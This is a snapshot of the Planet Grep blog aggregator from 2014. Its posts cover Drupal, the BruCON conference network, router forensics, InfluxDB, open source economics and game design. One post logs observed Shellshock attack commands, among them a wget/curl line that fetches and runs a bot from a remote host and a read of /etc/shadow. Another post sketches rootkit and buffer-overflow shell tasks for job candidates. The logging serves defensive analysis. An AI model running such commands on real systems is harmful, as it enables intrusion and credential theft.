01 Oct 2014

feedPlanet Grep

Dries Buytaert: Drupal 8 beta 1 released

Topic:
Drupal

Today we announced Drupal 8 beta 1! This key milestone is the work of over 2,300 people who have contributed more than 11,500 committed patches to 15 alpha releases, and especially the 234 contributors who fixed 178 "beta blocker" issues. A massive thank-you to everyone who helped get Drupal 8 beta 1 done.

For more information on the beta, please read the beta 1 release announcement. To read about the new features in Drupal 8, see Drupal.org's Drupal 8 landing page.

Betas are for developers and site builders who are comfortable reporting (and where possible, fixing) their own bugs, and who are prepared to rebuild their test sites from scratch if necessary. Beta releases are not recommended for non-technical users, nor for production websites.

01 Oct 2014 9:21am GMT

30 Sep 2014

feedPlanet Grep

Xavier Mertens: BruCON 0x06 Network Review

Network AccessOnce again, here is my quick review about the BruCON network that we deployed for our beloved attendees! Yes, we are glad to take care of your packets during the conference. Nothing changed since the last edition, we deployed the same network in the same venue with the same controls in place. But this year, the biggest change was our brand new wall of sheep…

Let's start with some stats! Our Internet bandwidth was the same as last year: a 100Mbits wireless link. This is was enough as we had peaks up to 80 Mbits of traffic. Hélas, our partner which provides the Internet pipe is still not ready to deliver IPv6.

Traffic Overview

(Click to enlarge)

We provide two networks: a "public" for the visitors and a "private" one for the crew, the speakers which is not sniffed. The Wi-Fi network is the most used but more and more people decided to stick to 3G/4G connectivity to avoid connecting to the wild network. We detected 334 unique MAC addresses which requested an IP address during the conference. The split across the different client types is shown below.

(Click to enlarge)

(Click to enlarge)

(Click to enlarge)

(Click to enlarge)

(Click to enlarge)

(Click to enlarge)

About the applications used, HTTP remains in first position, not a surprise. If HTTP remains the top protocol, SSL & OpenVPN came in 2nd and 3rd position. This means that people also tend to use encrypted communications.

(click to enlarge)

(click to enlarge)

DNS is always a goldmine. Here is a top-20 of requests that we captured (based on DNS traffic, whatever DNS servers were used!). To clean up the mess, I removed the PTR requests.

Count Query
28847 google
25334 a.t
19089 google.com
11895 wpad
9113 t.co
5738 brucon
5487 brucon.org
4917 apple.com
4102 ey.net
3956 pentesteracademy
3733 appspot.l.google.com
3697 pentesteracademylab.appspot.com
3434 printer
3314 facebook.com
3158 amazon.com
2773 images.amazon.com
2752 ecx.images-amazon.com
2730 twitter.com
2520 ssl
2422 clients.l.google.com

Personnally, next year, I'd like to create some honeypots to redirect the traffic to hosts like "wpad" (Web Proxy Autodiscovery Protocol) or "printer" ;-). We provided a DNS server via DHCP but many people have fixed DNS servers configured. Funny, lot of them where RFC1918 IP addresses not used on the BruCON network. Corporate servers?

Count DNS Server
131815 10.4.0.1 (BruCON official DNS)
73294 224.0.0.251
32559 ff02::fb
14887 224.0.0.252
13939 ff02::1:3
6544 8.8.8.8 (Google)
2294 172.246.84.42
883 8.8.4.4 (Google)
565 86.39.202.67
500 208.67.222.222 (OpenDNS)

We detected network flows with ~25K unique hosts over the world. Mainly to the Europe and United States.

Connections Map

(Click to enlarge)

It's also interesting to search for errors or "weird" traffic. Here is the top-20 of problems/suspicious traffic detected by Bro:

Count> Suspicious Behavior
7891 dns_unmatched_msg
3578 dns_unmatched_reply
1607 data_before_established
1456 unmatched_HTTP_reply
1342 possible_split_routing
1017 unescaped_special_URI_char
1015 window_recision
884 line_terminated_with_single_CR
811 above_hole_data_without_any_acks
734 TCP_ack_underflow_or_misorder
453 unknown_packet_type
350 dns_unmatched_msg_quantity
294 DNS_Conn_count_too_large
284 TCP_seq_underflow_or_misorder
270 unknown_protocol_2
210 zero_length_ICMPv6_ND_option
178 non_ip_packet_in_egre
177 bad_HTTP_request
173 connection_originator_SYN_ack
169 inflate_failed

We also provider a Tor SOCKS proxy to the visitors but it was not eavily used… Maybe promote it more next year? But the brand new wall of sheep was a great success. It is a modified version of Dofler and offers the following features:

(Click to enlarge)

(Click to enlarge)

Displaying pictures on the fly is dangerous when hackers will be the primary target. That's why I implemented a skin-color detection filter to prevent most of the p0rn images to be displayed on the wall-of-sheep. Of course, it became quickly a new game for some attendees who tried to display all kind of (not only p0rn) pictures. Most of the time they successed but the filter was working quite well nevertheless. Check the two following impressive numbers:

About the captured accounts, even if people are more aware and are trying to protect themselves, we collected 242 accounts:

That's all for my wrap-up!

30 Sep 2014 7:06pm GMT

Frank Goossens: Amazed by Autoptimize take-up

autoptimize at +200K downloads, wow!Less then a year after reaching 100000 downloads, Autoptimize broke the 200000 barrier just last week.

It's also exiting to see how people are blogging (or tweeting) about it as well;

So yeah, I'm pretty amazed by how well Autoptimize is doing. Thanks for the confidence!

30 Sep 2014 6:46pm GMT

Xavier Mertens: Online Router Forensics Lab

Crime SceneWhen my friend Didier Stevens contacted me last year to help him with a BruCON 5×5 project, I simply could not decline! Didier developed a framework to perform forensic investigations on Cisco routers. His framework is called NAFT ("Network Appliance Forensic Toolkit"). It is written in Python and provides a good toolbox to extract juicy information from routers memory. From a development point of view, the framework was ready but Didier has the great idea to prepare a workshop to train student to analyze router memory images. The 5×5 project was accepted and thanks to the support of BruCON, it was possible to buy a bunch of Cisco routers to let students play with them. Why hardware routers and not simply a virtual lab (after all we are living in the virtualisation era)? For two main reasons: To avoid licensing issues and a virtual lab does not offer the ROMMON feature which is very useful to take a memory image of the router. The very first workshop was given last week during BruCON as a first premiere. With a fully booked room of people (40), it was a success and we already got good feedbacks. But not all people are able to attend security conferences and workshops, that's why Didier had the idea to implement an online lab where registered people could perform the same investigations as in the live workshop. That's where I was involved in the project!

Here are a few words about the lab that has been deployed. It is based on a hardened Linux server and two Cisco 2610 routers connected together. The private network is available to generate some IP traffic. The routers serial consoles are also connected. Here is a small schema of the lab:

NAFT Lab Topology

The Cisco routers can be managed via a telnet connection or via their console port. All tools are pre-installed to perform the memory dump analysis:

To access the lab, you just need a SSH client:

Click to enlarge

The lab is available to anybody who would like to test Didier's framework. We also opened a website with information about the project and a booking system. You just have to select the day(s) and fill a small form. Once approved, a temporary account will be created and credentials will be sent.

Presented as an exclusivity during BruCON, Didier and myself are happy to announce that the lab is publicly available right now via router-forensics.net. If you're interested in a workshop for your school, your event, feel free to contact us! We have routers ready on the road ;-) The next workshop has been scheduled during Hack.lu in Luxembourg.

Routers on the Road

30 Sep 2014 2:38pm GMT

Dieter Plaetinck: A real whisper-to-InfluxDB program.

The whisper-to-influxdb migration script I posted earlier is pretty bad. A shell script, without concurrency, and an undiagnosed performance issue. I hinted that one could write a Go program using the unofficial whisper-go bindings and the influxdb Go client library. That's what I did now, it's at github.com/vimeo/whisper-to-influxdb. It uses configurable amounts of workers for both whisper fetches and InfluxDB commits, but it's still a bit naive in the sense that it commits to InfluxDB one serie at a time, irrespective of how many records are in it. My series, and hence my commits have at most 60k records, and presumably InfluxDB could handle a lot more per commit, so we might leverage better batching later. Either way, this way I can consistently commit about 100k series every 2.5 hours (or 10/s), where each serie has a few thousand points on average, with peaks up to 60k points. I usually play with 1 to 30 InfluxDB workers. Even though I've hit a few InfluxDB issues, this tool has enabled me to fill in gaps after outages and to do a restore from whisper after a complete database wipe.

30 Sep 2014 12:37pm GMT

Dries Buytaert: Scaling Open Source communities

Topic:
Drupal

We truly live in miraculous times. Open Source is at the core of the largest organizations in the world. Open Source is changing lives in emerging countries. Open Source has changed the tide of governments around the world. And yet, Open Source can be really difficult. Open Source can be largely a thankless job. It is hard to find volunteers, it is hard to find organizations to donate time or money, it is hard to organize the community, it is hard to learn, it is hard to attract full-time contributors, and more. As the project lead for Drupal, one of the largest Open Source projects/communities in the world, I live these challenges every day. In this blog post, I will analyze the challenge with scaling Open Source communities and recommend a solution for how to build very large Open Source communities.

Open Source projects are public goods

In economic terms, for something to be a "public good", it needs to match two criteria:

  1. non-excludability - it is impossible to prevent anyone from consuming that good, and
  2. non-rivalry - consumption of this good by anyone does not reduce the benefits available to others.

Examples of public goods include street lighting, national defense, public parks, basic education, the road system, etc. By that definition, Open Source software is also a "public good": we can't stop anyone from using Open Source software, and one person benefiting from Open Source software does not reduce the benefits available to others.

The realization that Open Source is a public good is a helpful one because there has been a lot of research about how to maintain and scale public goods.

Public goods and the free-rider problem

The biggest problem with public goods is the "free rider problem". A free rider is someone who uses a public good but who does not pay anything (or pay enough) towards its cost or production. If the maintainers of a public good do not address the free-rider problem it can lead to the non-production or under-production of a public good. This is generally known as the "Tragedy of the Commons".

In Open Source, a free-rider is someone who uses an Open Source software project without contributing to it. If too few people or organizations contribute to the project, the project can become unhealthy, and ultimately could cease to exist.

The free-rider problem is typical for public goods and does not usually arise with private businesses. For example, community-maintained software like Drupal may have many free riders but proprietary competitors like Adobe or Sitecore have no problem excluding those who will not pay a license fee.

To properly understand the free-rider problem and public good provision, we need to understand both self-interest theory and the theory of collective action. I'll discuss both theories and apply them to Open Source.

Self-interest theory

Open Source contributors do amazing things. They contribute to fixing the hardest problems, they volunteer to help others, they share their expertise, and more. Actions like these are often described as altruistic, in contrast to the pursuit of self-interest. In reality, generosity is often driven by some level of self-interest: we provide values to others only on terms that benefit ourselves.

Many reasons exist why people contribute to Open Source projects; people contribute because they enjoy being part of a community of like-minded people, to hone their technical skills, to get recognition, to try and make a difference in the world, because they are paid to, or for different forms of "social capital". Often we contribute because by improving the world we are living in, we are making our world better too.

Modern economics suggest that both individuals and organizations tend to act in their own self-interest, bound by morals, ethics, the well-being of future generations and more. The theory of self-interest goes back to the writings of the old Greeks, is championed by early modern economists, and is still being adhered to by late-modern economists. It follows from the theory of self-interest that we'd see more individuals and organizations contribute if they received more benefits.

While contributing to Open Source clearly has benefits, it is not obvious if the benefits outweigh the cost. If we can increase the benefits, there is no doubt we can can attract more contributors.

Collective action theory

The theory of self-interest also applies to groups of individuals. In his seminal work on collective action and public goods, economist Mancur Olson shows that the incentive for group action diminishes as group size increases. Large groups are less able to act in their common interest than small ones because (1) the complexity increases and (2) the benefits diminish.

We see this first hand in Open Source projects. As an Open Source project grows, aspects of the development, maintenance and operation have to be transferred from volunteers to paid workers. Linux is a good example. Without Red Hat, IBM and Dell employing full-time Linux contributors, Linux might not have the strong market share it has today.

The concept of major public goods growing out of volunteer and community-based models is not new to the world. The first trade routes were ancient trackways, which citizens later developed on their own into roads suited for wheeled vehicles in order to improve commerce. Transportation was improved for all citizens, driven by the commercial interest of some. Today, we certainly appreciate that full-time government workers maintain the roads. Ditto for the national defense system, basic education, etc.

The theory of collective action also implies that as an Open Source project grows, we need to evolve how we incent contributors or we won't be able to attract either part-time volunteers or full-time paid contributors.

Selective benefits

Solutions for the free-rider problem and collective action problem exist, and this is where Open Source can learn from public goods theory and research. The most common solution for the free-rider problem is taxation; the government mandates all citizens to help pay for the production of the public good. Taxpayers help pay for our basic education system, the road system and national defense for example. Other solutions are privatization, civic duty or legislation. These solutions don't apply to Open Source.

I believe the most promising solution for Open Source is known as "privileged groups". Privileged groups are those who receive "selective benefits". Selective benefits are benefits that can motivate participation because they are available only to those who participate. The study of collective action shows that public goods are still produced when a privileged group benefits more from the public good than it costs them to produce it.

In fact, prominent "privileged groups" examples exist in the Open Source community; Automattic is a privileged group in the WordPress community as it is in a unique position to make many millions of dollars from WordPress.com. Mozilla Corporation, the for-profit subsidiary of the Mozilla Foundation, is a privileged group as it is in a unique position to get paid millions of dollars by Google. As a result, both Automattic and Mozilla Corporation are willing to make significant engineering investments in WordPress and Mozilla, respectively. Millions of people in the world benefit from that every day.

Drupal is different from Automattic and Mozilla in that no single organization benefits uniquely from contributing. For example, my company Acquia currently employs the most full-time contributors to Drupal but does not receive any exclusive benefits in terms of monetizing Drupal. While Acquia does accrue some value from hiring the Drupal contributors that it does, this is something any company can do.

Better incentives for Drupal contributors

It's my belief that we should embrace the concept of "privileged groups" and "selective benefits" in the Drupal community to help us grow and maintain the Drupal project. Furthermore, I believe we should provide "selective benefits" in a way that encourages fairness and equality, and doesn't primarily benefit any one particular organization.

From the theory of self-interest it follows that to get more paid core contributors we need to provide more and better benefits to organizations that are willing to let their employees contribute. Drupal agencies are looking for two things: customers and Drupal talent.

Many organizations would be eager to contribute more if, in return, they were able to attract more customers and/or Drupal talent. Hence, the "selective benefits" that we can provide them are things like:

  • Organizational profile pages on drupal.org with badges or statistics that prominently showcase their contributions,
  • Advertising on the drupal.org in exchange for fixing critical bugs in Drupal 8 (imagine we rewarded each company that helped fix a critical Drupal 8 bug 10,000 ad views on the front page of drupal.org),
  • Better visibility on Drupal.org's job board for those trying to hire Drupal developers,
  • The ability to sort the marketplace by contributions, rather than just alphabetically
  • ...

I'm particularly excited about providing ads in exchange for contributing. Contributing to Drupal now becomes a marketing expense; the more you contribute, the more customers you can gain from drupal.org. We can even direct resources; award more ad views in exchange for fixing UX problems early in the development cycle, but award critical bugs and beta blockers later in the development cycle. With some relatively small changes to drupal.org, hiring a full-time core developer becomes a lot more interesting.

By matching the benefits to the needs of Drupal agencies, we candirect more resources towards Drupal development. I also believe this system to be fair; all companies can choose to contribute to Drupal 8 and earn advertising credits, and all participants are rewarded equally. We can turn Drupal.org into a platform that encourages and directs participation from a large number of organizations.

Systems like this are subject to gaming but I believe these challenges can be overcome. Any benefit is better than almost no benefit. In general, it will be interesting to see if fairness and heterogeneity will facilitate or impede contribution compared to Open Source projects like WordPress and Mozilla, where some hold unique benefits. I believe that if all participants benefit equally from their contributions, they have an incentive to match each other's contributions and it will facilitate the agreement and establishment of a contribution norm that fosters both cooperation and coordination, while minimizing gaming of the system. In contrast, when participants benefit very differently, like with WordPress and Mozilla, this decreases the willingness to cooperate, which, in turn, could have detrimental effects on contributions. While not necessarily the easiest path, I believe that making the system fair and heterogeneous is the "Drupal way" and that it will serve us in the long term.

Conclusions

There are plenty of technical challenges ahead of us that we need to work on, fun ideas that we should experiment with, and more. With some relatively small changes, we could drastically change the benefits of contributing to Drupal. Better incentives mean more contributors, and more contributors mean that we can try more things and do things better and faster. It means we can scale Drupal development to new heights and with that, increase Open Source's impact on the world.

30 Sep 2014 9:47am GMT

Philip Van Hoof: nrl:maxCardinality one-to-many ontology changes

I added support for changing the nrl:maxCardinality property of an rdfs:Property from one to many. Earlier Martyn Russel reverted such an ontology change as this was a blocker for the Debian packaging by Michael Biebl.

We only support going from one to many. That's because going from many to one would obviously imply data-loss (a string-list could work with CSV, but an int-list can't be stored as CSV in a single-value int type - instead of trying to support nonsense I decided to just not do it at all).

More supported ontology changes can be found here.

Not sure if people care but this stuff was made while listening to Infected Mushroom.

30 Sep 2014 12:12am GMT

29 Sep 2014

feedPlanet Grep

Philip Van Hoof: Bescherm ons tegen afluisteren, luister zelf enkel binnen een wettelijk kader af

De overheid hoort onze burgers te beschermen tegen afluisteren, de overheid kan en mag zelf afluisteren maar kan en mag dit enkel binnen een wettelijk kader doen.

Allerlei zaken tonen aan dat overheden binnen de NAVO alliantie ons land aanvallen met digitale inbraken. Het baart me zorgen.

Technisch betekent dit voor mij dat ons land moet investeren in beveiliging van systemen. Hier hoort kennis en controle over hardware en software op diep niveau bij.

Ik hoop dat Pieter De Crem niet enkel in straaljagers maar ook in het beveiligen van 's lands computersystemen investeert.

Dat betekent voor mij kennis en controle op het niveau van de bootloader, de kernel en de hardware. De systemen van de overheid bevatten immers bijzonder veel gegevens van de burger. De systemen van het leger geven dan weer informatie en toegang tot apparatuur die de beveiliging en de vrede van het land garandeert.

Wat betreft de kernel moet een recruit het boek van Robert Love de dagen voor het sollicitatiegesprek doornemen. Hij of zij moet met het Internet als hulp een kernel module kunnen maken. Dat is een minimum.

Een goede technische test zou zijn om een eigen rootkit kernel module te schrijven gedurende de dagen dat het sollicitatiegesprek plaatsvindt (ja, dagen). Hierbij zouden enkele doelstellingen kunnen opgesteld worden: Bv. het verbergen van de .ko file op het filesysteem die eerder met insmod ingeladen werd, het kopiëren van alle uitgaande TCP/IP data naar een verborgen stuk hardware, en zo verder.

Dit laatste zonder veel van het geheugen van de host te verbruiken daar het verborgen stuk HW vermoedelijk trager zal zijn dan de normale netwerk interface (de eth0 t.o.v. bv. 3G). Een oplossing zou kunnen zijn te filteren gecombineerd met af en toe wat packet loss te veroorzaken door verborgen netif_stop_queue en netif_wake_queue calls op de normale netwerk interface te doen. Misschien heeft de recruit wel betere ideeën die moeilijk of niet gedetecteerd kunnen worden? Ik hoop het!

De recruit moet een manier voorzien (die niet vanzelfsprekend is) om commando's te ontvangen (liefst eentje die moeilijk gedetecteerd kan worden). Misschien het gebruik maken van radio op zo'n manier dat het moeilijk te detecteren is? Ik ben benieuwd.

Hoe meer van dat soort doelstellingen gehaald worden, hoe geschikter de kandidaat.

Wat betreft userland moet een recruit gegeven een stuk code waar een typische bufferoverflow fout in zit die bufferoverflow herkennen. Maar gun uw recruit de tijd en een ontspannen sfeer want onder stress zien enkel de gelukzakken af en toe eens zoiets. Het reviewen van (goede) code is nl. iets dat vele jaren ervaring vraagt (slechte code is eenvoudiger, maar over de slechte code van de wereld, zoals dnsmasq, gaan de hedendaagse security problemen niet. Wel over bv. OpenSSL en Bash).

De daarop volgende vraag zou kunnen zijn om door middel van die bufferoverflow ingevoerde code uit te laten voeren. Dit mag met behulp van het Internet om alle antwoorden te vinden. Extra punten wanneer de uitgevoerde code met of zonder netcat de zaak op een TCP/IP poort available maakt.

De dienst zou bv. een socket server kunnen maken dat een bufferoverflow heeft op de buffer die meegegeven wordt met read(). Dat zou zelfs een junior C developer moeten herkennen.

Dit soort van testen zijn nodig omdat enkel zij die technisch weten (en kunnen implementeren) hoe na een inbraak zichzelf te verbergen, geschikt zijn om het land te verdedigen tegen de NSA en de GCHQ.

Ik ben er van overtuigd dat zij die dit kunnen een redelijk goed moreel compas hebben: Mensen met zo'n inzicht hebben capaciteiten. Zulke mensen hebben daardoor vaak ook een goed doordacht moreel compas. Zolang de overheid haar eigen moreel compas volgt, zijn deze mensen bereid hun kunnen voor de overheid in te zetten.

Meneer de kolonel van het leger moet wel beseffen dat de gemiddelde programmeur eigenlijk gewoon technologie wil doorgronden. Dat die technologie toevallig ook voor bommen gebruikt wordt is niet de schuld van de programmeurs. Dat de kolonel zijn communicatie-technologie vol fouten zit wil niet zeggen dat de programmeurs die deze vinden criminelen zijn. Kolonel meneer zou beter tot Thor bidden dat s' lands programmeurs er eerder achter komen dan de echte vijand erachter komt.

Maar de wet staat boven de militair. Ze moet gevolgd worden. Ook door de inlichtingendiensten. Het is onze enige garantie op een vrije samenleving: ik wil niet werken of geholpen hebben aan een wereld waarin de burger door technologie vrijheden zoals privacy verliest.

Met vriendelijke groeten,

Philip. Programmeur.

29 Sep 2014 11:45pm GMT

Xavier Mertens: Some Personal Shellshock Stats

ShellsockIn April 2014, the Internet shivered when we faced the "heartbleed" bug in the OpenSSL library. It makes lot of noise across the security community and was even covered by regular media. Such issue could never happen again, right?

Never say never! Last week, a new storm in the Internet with "shellsock" or best known as CVE-2014-6271! This new bug affects the bash UNIX shell. The difference with heartbleed? When you compare them, heartbleed looses definitively its pole position on the top threats. It is very easy to exploit, it affects MANY applications or services that spawn other processes using call like system() on PHP or the well-know mod_cgi provided by Apache. Not only public websites can be affected by also some critical services like:

So, any service in which the environment is defined via a bash shell execution. If you need more info about this new threat, google for it!

Some security researchers and bloggers immediately started to scan the Internet to have a better idea of the impact of this vulnerability on public services. Of course, bad guy also started to do the same and my server was hit several times (94). Until today, I detected the following IP addresses:

109.80.232.48
109.95.210.196
119.82.75.205
128.199.223.129
128.204.199.209
166.78.61.142
176.10.107.180
178.32.181.108
2001:4800:7812:514:1b50:2e05:ff04:c849:52116
209.126.230.72
24.251.197.244
54.251.83.67
62.210.75.170
79.99.187.98
80.110.67.10
83.166.234.133
89.207.135.125
89.248.172.139
93.103.21.231

Here is a list of commands/scripts tested:

/bin/ping -c 1 198.101.206.138
/bin/bash -c "echo testing9123123"; /bin/uname -a
/sbin/ifconfig
/bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"
echo -e "Content-Type: text/plain\\n"; echo qQQQQQq
/bin/cat /etc/shadow
echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444
/bin/bash -c "/usr/bin/wget http://singlesaints.com/firefile/temp?h=rootshell.be -O /tmp/a.pl"
/bin/bash -c "wget -q -O /dev/null http://ad.dipad.biz/test/http://leakedin.com/"
/bin/bash -c "wget -U BashNslash.http://www.leakedin.com/tag/urls-list/page/97/ 89.248.172.139"
wget 'http://taxiairportpop.com/s.php?s=http://brucon.org/'

Personally, I like the one which tries to use the built-in support of sockets via psuedo files like "/dev/[tcp|udp]/<host>/<port>". This is a nice feature of bash but it is disabled on most distribution (for security reason presicely).

29 Sep 2014 6:59pm GMT

Joram Barrez: Webinar ‘Process Driven Spring Applications with Activiti’ now on Youtube

As I mentioned, I did a webinar on Spring Boot + Activiti last week (at 6 am …. yes, it hurt) with my good pal Josh Long. If you missed it, or want to see the awesomeness again, here's the recording: On a similar note, the webinar that Josh did before this one, on Spring […]

29 Sep 2014 10:46am GMT

27 Sep 2014

feedPlanet Grep

Damien Sandras: GNOME 3 and HIG Love

I am making progress on the next Ekiga release. I have spent the last few months of spare time working on the user interface. The purpose is to adapt the UI and use the great GTK+3 features when adequate. There is still much left to do, but here are before and after screenshots. Stay tuned […]

27 Sep 2014 4:56pm GMT

25 Sep 2014

feedPlanet Grep

Frank Goossens: Music from Our Tube; Benjamin Booker’s Violent Shiver

"Violent Shiver" was Benjamin Booker's very first single. And it's an impressive one, as far as one-song-debuts go. This is a live version recorded for WFUV.

YouTube Video
Watch this video on YouTube or on Easy Youtube.

25 Sep 2014 11:09pm GMT

24 Sep 2014

feedPlanet Grep

Frank Goossens: The Broken Smartphone Breakdown

broken smartphone (http://pixabay.com/en/broken-cell-phone-cellular-72161/)I'm a spoiled, clumsy brat. Spoiled because my (previous) employer hands out yearly vouchers, which I use to buy me a new top-notch smartphone every 2-3 years. And clumsy as I all too often loose of break those expensive gadgets, forcing me to look for cheaper replacements. So here's the breakdown of my smartphone history;

  1. 2009: HTC Hero: my first smartphone (although I wasn't complaining about that 2nd hand Nokia e61i). I lost it on the train a year and a half after buying it
  2. 2011: Acer beTouch e110: cheap replacement for the HTC Hero, only used it for a couple of weeks before selling it because it was a horrible excuse of a smartphone.
  3. 2011: HTC Magic: 2nd hand replacement, it was a great little handset once it was flashed with Cyanogenmod. I sold it for my next new phone, the …
  4. 2011: Samsung Galaxy SII: Had a great time with that Sammy, lots of upgrades & tweaks. but I did need to have it repaired within a year of buying it, after it fell out of my pocket when getting off the train.
  5. 2012: Samsung Omnia 7: My first encounter with the Windows Phone Metro interface as a temporary device, while the SII was getting fixed.
  6. 2012: Samsung Galaxy SII: back from repairs and was very happy with it, but a year after that it broke down again.
  7. 2013: HTC Radar: temporary replacement for the SII, Windows Phone again.
  8. 2013: Samsung Galaxy S4: A brand new handset which I dropped approx. a year after buying it. Not really a huge leap forward compared to the SII, but I did love the speed improvements 4G offered.
  9. 2014: Samsung Galaxy Gio: temporary replacement for the broken S4. but despite the fact I got my main apps up and running (incl. Firefox Mobile), the old version of Android (2.3.6), the small screen and a serious lack of memory decided this was not a permanent replacement.
  10. 2014: Google Galaxy Nexus; 2nd hand replacement (bought yesterday, a steal for only €95) with Cyanogenmod 11. Early days, but I just might try not to drop it, I'm loving it already. The only thing I really miss is 4G support, because, after all, I am a spoiled brat.

24 Sep 2014 3:07pm GMT

Dieter Plaetinck: InfluxDB as a graphite backend, part 2

The Graphite + InfluxDB series continues.

  • In part 1, "On Graphite, Whisper and InfluxDB" I described the problems of Graphite's whisper and ceres, why I disagree with common graphite clustering advice as being the right path forward, what a great timeseries storage system would mean to me, why InfluxDB - despite being the youngest project - is my main interest right now, and introduced my approach for combining both and leveraging their respective strengths: InfluxDB as an ingestion and storage backend (and at some point, realtime processing and pub-sub) and graphite for its renown data processing-on-retrieval functionality. Furthermore, I introduced some tooling: carbon-relay-ng to easily route streams of carbon data (metrics datapoints) to storage backends, allowing me to send production data to Carbon+whisper as well as InfluxDB in parallel, graphite-api, the simpler Graphite API server, with graphite-influxdb to fetch data from InfluxDB.
  • Not Graphite related, but I wrote influx-cli which I introduced here. It allows to easily interface with InfluxDB and measure the duration of operations, which will become useful for this article.
  • In the Graphite & Influxdb intermezzo I shared a script to import whisper data into InfluxDB and noted some write performance issues I was seeing, but the better part of the article described the various improvements done to carbon-relay-ng, which is becoming an increasingly versatile and useful tool.
  • In part 2, which you are reading now, I'm going to describe recent progress, share more info about my setup, testing results, state of affairs, and ideas for future work

read more

24 Sep 2014 11:56am GMT

21 Sep 2014

feedPlanet Grep

Steven Wittens: The Cargo Cult of Game Mechanics

Form without Function

There's been a lot of fuss about gaming and gaming culture lately, in particular the nature of gaming journalism. Don't worry, I'm so not sticking my face into that particular beehive. However, I do agree the conversation around gaming is crap, so instead I'm posting the kind of opinion piece I wish I'd see on credible gaming sites, as someone who actually knows how the sausage is made.

Dear Esther
Dear Esther

But is it Art?

Gamers like to talk-or argue-about graphics, frame rates, physics, hours of play time, item variety, models, textures, downloadable content and microtransactions, and so on. There is a reason the Glorious PC Master Race and the Console Wars are memes. If games are art, if it's a grown up medium, why do we fuss about trivialities so much? You don't debate high literature by critiquing the paper stock or chapter length.

Well because production values are important for immersion. Details and performance really matter. However when we treat games just as mechanical live pictures, we're missing the point entirely. It's confusing form with function. In The Dark Knight, Heath Ledger's Joker should look the part, but he'll be 10x scarier and more interesting once you understand how he operates and thinks. This seems obvious in film, yet not in gaming.

Even "artistic games" like Dear Esther are often criticized for superficial mechanics (or lack thereof), not for what they set out to do. The question isn't whether Dear Esther is just a walking simulator. It's whether it's anywhere near as engaging as walking around a real place, like a park or a museum. If it fails, it's not because there aren't any puzzles. The Anne Frank House in Amsterdam does not require puzzles. It does have a secret passage but the only achievement you get for finding it is sadness.

Yup, that awkward pause is where the "gaming as a serious medium" debate usually hangs, and it leaves the conversation severely deadlocked. Trying to add gamified elements for the heck of it, to make a gamier game, rings hollow and does not get us any closer to credibility.

Heavy Rain
Heavy Rain

The popular alternative is to simply adopt the current forms of Serious Media. To make a game more like a movie or a book, whether blockbuster or arthouse. It generally involves taking away choice, using scripts instead of simulations, with mini-games and quick-time events thrown in to amuse your hindbrain. It's tacitly saying that real storytelling, real human comedy or tragedy, can't happen while a player is in control. It's non-sense of course, plenty of games have done so before.

Somehow though we've forgotten how to do it, and I don't think I'm alone in thinking this. This existential crisis was perfectly embodied in indie gem The Stanley Parable, a post-modern tale of choice. It's a game about playing a game, constantly breaking the fourth wall. There's recursive gags, self-parodying achievements, 'victory' conditions that require you to quit the game, and other surgical strikes at typical gaming habits. It garnered critical praise from gamers and journalists alike, playing like a love-hate letter to its audience: at times cooperative and happy, other times sardonic and sadistic.

The Stanley Parable
The Stanley Parable

I'm pretty sure The Stanley Parable is Art. There's just one thing bothering me. It doesn't actually offer you any choice. The game is an admission of defeat.

Choice is of course a tricky concept, that was the whole point, so let me be more specific. You could feasibly make a 100% Let's Play of Stanley Parable, covering all the branching paths, and turn it into a sort of Dragon's Lair on Laserdisc. It would lose little in translation, most of the gags would still work. It's not a game about your choices, it's still just about watching theirs.

Live in Your World, Play in Ours

If you're looking for someone to blame (you know, in general), it's easy to point to the incestuous industry. Games are big business and cost a ton to produce. The primary purpose of talking about games is to sell things to gamers, in a market that moves very fast, saturated with product. Hence brands and franchises compete over the attention of customers, preferably through lock-in. It goes beyond ordinary sales, and includes pre-orders, season passes, virtual marketplaces and other monetary aids. Be sure to use a condom.

For several years now though, there has been a counterpoint: the wave of DRM-free indies, Humble Bundles and the wild success of Kickstarter. Notably, industry veterans Tim Schafer and Brian Fargo, known for beloved classics like Monkey Island and Wasteland, each held out their hats and promised to bring back the glory days of old. Gamers rewarded them in spades. Budgets ballooned from a few hundred thousand to several million, spawning further spinoffs. Chris Roberts of Wing Commander fame did even better. He kickstarted Star Citizen to the tune of a few million, but continues to raise funds today with virtual goods and perks for the future game. It now exceeds $50 million in backer funding.

Typical game ad
Destiny vs Star Citizen

If I were cynical, which I am, I would say a bunch of people have spent hundreds of dollars each on virtual assets with no guarantee they'll ever work as promised. This is the power of nostalgia mixed with in-engine mockups, and it's clearly very good business. Don't get me wrong, I've funded a few games on Kickstarter too, below retail. But what comes out of these projects is raising some eyebrows, with hype, delays and cancellations galore. I think it points to a deeper issue altogether, driven by games but not limited to gaming.

On the surface these developers are giving their fans exactly what they want. Something they already love, modernized and expanded, with early access and feedback. You cannot fault the creators for this. Rather, I think the problem is that gaming fans don't know what they want. It's a know it when I see it kind of affair. So they just ask for more of the same instead, again confusing form with function.

There's an elephant in the room. Everybody does it to some degree, but it's somehow shameful.

Compulsion.

It's even more obvious when you consider that the easy money in gaming isn't actually to bankroll a $200 million console blockbuster, half of which is probably marketing. Rather, it's to put a carefully tuned slot machine under the noses of as many people as possible, like say, a free-to-play smartphone game. With lots of push notifications and time locks, using fictional hooks to create personal investment and a sense of false scarcity. People pull their phones out in elevators and on the toilet, multiple times a day. It's guaranteed brain share if you get in, so much easier than convincing everyone to fork out $50 once, let alone monthly.

The real target audience is a small minority of whales-compulsive users-to buy the virtual currency and goods you mint at will. They subsidize the free users, who in turn provide word of mouth on social media. It's gambling and addiction, by any other name, only now people are betting real money against fake money, so it's legal.

Free to play

Most gamers are familiar with the "one more turn" itch of strategy or puzzle games, the desire to open every chest and read every log, the zombiefied stares at LAN parties. It's a common trope to be obsessive, but gamers are generally self-aware about it. We don't mind wasting time if it's fun, that's the point, and it gives the Youtubers something to do.

But the Skinner box is still real. Too often we see products that seem to consist mainly of compulsive triggers. Where the developers built a guided theme park ride with only the promise of cake at the end. They set out a generic progression tree and loom a nebulous threat overhead that can only be beaten by a fully armed and operational Level 80 Battlemage. Between you and the end stand a thousand foes and a bunch of fetch/build/shoot/escort quests. Everything will be perfectly scaled to offer the permanent illusion of a challenge you can barely win, and are constantly forced to work for.

